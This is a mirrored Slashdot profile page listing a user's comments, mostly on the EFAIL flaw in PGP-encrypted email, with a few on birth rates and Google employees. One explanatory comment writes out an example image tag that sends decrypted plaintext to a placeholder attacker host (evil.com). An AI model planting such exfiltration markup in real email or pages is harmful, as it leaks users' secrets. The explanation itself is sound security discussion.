Slashdot Mirror


User: gweihir

gweihir's activity in the archive.

Stories
0
Comments
19,136
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 19,136

  1. Re:PEBCAK on Ask Slashdot: Which Is the Safest Router? · · Score: 1

    People continue to look for easy answers, even after it has been made amply clear to them that these do not cut it. The human condition at work...

  2. Re:Good on US Births Dip To 30-Year Low (npr.org) · · Score: 1

    Very obviously so. There are a lot of irrational nay-sayers on this very idea though. These are the people that want to stick to the human race expanding against all evidence that it is not a good idea, until it starts to rot away like a bacterial colony that has grown too far. There are those that say this has already started...

  3. Re:Want us to have kids on US Births Dip To 30-Year Low (npr.org) · · Score: 4, Insightful

    It is not about money. At some time, a society just reaches a state where it does not expand anymore and instead shrinks down slowly to a sane size. Most of the west is already there or getting there fast. It is not really a problem, you just need to manage this instead of ignoring it and sticking to the old recipes. Of course, the leadership of some countries is less well equipped to do that...

  4. Re:Feminism at work on US Births Dip To 30-Year Low (npr.org) · · Score: 3, Insightful

    You can, and a lot of people try. It is just hugely unethical and has spawned the most evil movements the human race has ever seen. (Organized Religion, Fascism, etc.)

  5. Re:Feminism at work on US Births Dip To 30-Year Low (npr.org) · · Score: 4, Insightful

    Naa, that would be rational, fact-based and forward-thinking. Cannot have that, must make America Great Again!

  6. Re:I don't get the issue with PGP? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · · Score: 1

    No problem in that case. This exploit depends on wrongly embedding the encrypted part of the email into html after decryption and then doing an external fetch of an image using it. Basically (simplified a lot), if your mailer transforms <img src="http://evil.com/[encrypted]"> to <img src="http://evil.com/my_secret_message">, then "my_secret_message" gets sent to evil.com as part of the query. The attacker would before that inject the http part into the non-encrypted part of the message.

    For this to work, you need a whole lot of pretty extreme stupidity:
    - mixed encrypted+non-encrypted messages
    - broken mime decoding that just concatenates things together
    - broken decryption use that does not treat results from decryption specially
    - broken email display that fetches external links like images.
    - no message whole-message integrity protection in (partially) encrypted messages or ignoring error reports form that integrity protection

    These are all faults on the side of the mailer, probably due to large enthusiasm, small skills, a mistaken belief that "new is better" and absolutely no understanding of software security.

  7. Re:I don't get the issue with PGP? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · · Score: 2

    Wait a minute. My understanding is that the attacker changed the ciphertext and got predictable plaintext to come out.

    That would actually not be a problem. In Plublic-Key Crypto, the attacker can always do that, because anybody can encrypt messages for a recipient.
    The problem is a combination of broken MIME decoding in combination with ignoring an error message from PGP/GnuPG and a really stupid decision to load external content when an email is displayed.

  8. Read the description of the problem again.

  9. Re:I don't get the issue with PGP? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · · Score: 5, Informative

    It is not a flaw in PGP/GnuPG. It is a flaw in the email software, or rather several flaws in combination. The combination seems to be widespread unfortunately.

  10. Re:A silver lining? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · · Score: 3, Insightful

    No need. The morons making "modern" mailers just need to learn about the basics of security.

  11. Re: I don't blame them on Google Employees Resign in Protest Against Pentagon Contract (gizmodo.com) · · Score: 1

    Virtue signalling does not involve accepting any real significant personal loss as part of the process. That one is called "personal integrity". But I guess you have no experience with that and hence cannot understand it.

  12. "Don't be evil" was just misdirection on Google Employees Resign in Protest Against Pentagon Contract (gizmodo.com) · · Score: 2

    Used to keep people friendly until they were large enough to show their true colors. Corporations lie and they lie about important stuff. So this is not really a surprise at all.

  13. PGP/GnuPG also does no MIME parsing, which must be broken as well to allow the attack. This is 100% incompetent implementation of email software by people that are clueless about security.

    I also have to say I find all the alarmists here a disgrace. Clueless, arrogant and panicky, a very bad combination.

  14. This is 100% the fault of the email client implementations. FWIW, if you still use mutt or pine or alpine etc, you're safe for now.

    Oh, yes. Mutt user here (at least for encrypted email), because I have never trusted these messed up insecure jokes that pass for email software these days. Automatically loading stuff from external places in this way is an instant security fail. Nobody with a clue is surprised this can be exploited.

  15. Nothing is "guaranteed to be secure". Incidentally, it is not PGP or GnuPG that is at fault here. It is fundamentally broken and insecure HTML and MIME parsing in the email software affected. PGP/GnuPG is perfectly fine.

  16. This should come as no surprise at all. Automatic decryption of emails is insecure, pretty much by definition. Anybody using that does not have security as it takes one tiny flaw somewhere else to exploit that. Also, automatically loading external stuff in an email reader is pretty much insane.

  17. Re:Action required: Disable HTML on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    I agree, the behavior of these security "researchers" is really unethical and unacceptable. My initial reaction was that with an announcement this bombastic, it will likely turn out to not be an elephant but a mouse. And look, it is. And people with a secure set-up are not even affected, only people that use fundamentally insecure software in the first place.

  18. Re:Or any other encryption on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    Indeed. The recipient can just publish the email or send it to a 3rd party. You need to be able to trust people you send secrets to.

  19. Re:Or any other encryption on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    On a related note, this is _email_! Automatically loading anything externally is just as insane as automatically opening attachments. Have the people writing this broken email software learned absolutely nothing from the past?

  20. Re:Final straw. Computers are NOT secure. I'm done on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    PGP is very much _not_ broken. Some wannabee mail software is badly broken in how it handles HTML, MIME and PGP integration. This is also not a surprise at all. There is a reason many of us still use mutt or elm or the like at least for encrypted email.

  21. Re:Some advice is worth what you paid for it on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    Indeed. This whole problem comes from crappy clueless implementations and crappy clueless defaults. Turning off PGP completely is entirely the wrong reaction.

  22. Re:Bad HTML Mail Clients on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    And _that_ is a sane default. Do insecure things, be insecure. There is not even a story here except that apparently many makers of email software are really clueless about security.

  23. Re:Bad HTML Mail Clients on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    I am a security expert and I would upgrade that to "extremely dumb" as in "completely clueless about security". And no, you are not wrong. Also, having a correct MIME parser or taking the warning about missing integrity protection seriously also works to solve this. This is a problem on the side of the mail software affected.

    Caveat: I have not looked at the finer details. I use mutt as mailer for anything encrypted with lynx as html-to-text filter and are decidedly not affected by any of this.

  24. Re:My understanding is this applies to HTML email on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    The thing is that apparently most email software these days is badly broken and will not only gladly load external includes in HTML email, but also mess up the MIME parsing and ignore warnings about missing integrity protection. I feel pretty smug now that I am on mutt (and will remain on it as primary MUA), even though I had to add lynx as an HTML-to-text filter because some people feel it is acceptable to send HTML-only email. If this were just private email, I would have happily ignored these, but unfortunately it is business.

  25. Re:Werner Koch's Response on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · · Score: 1

    And that is just it. This thing is way blown out of proportion and it is attributing blame to the wrong tool (and people).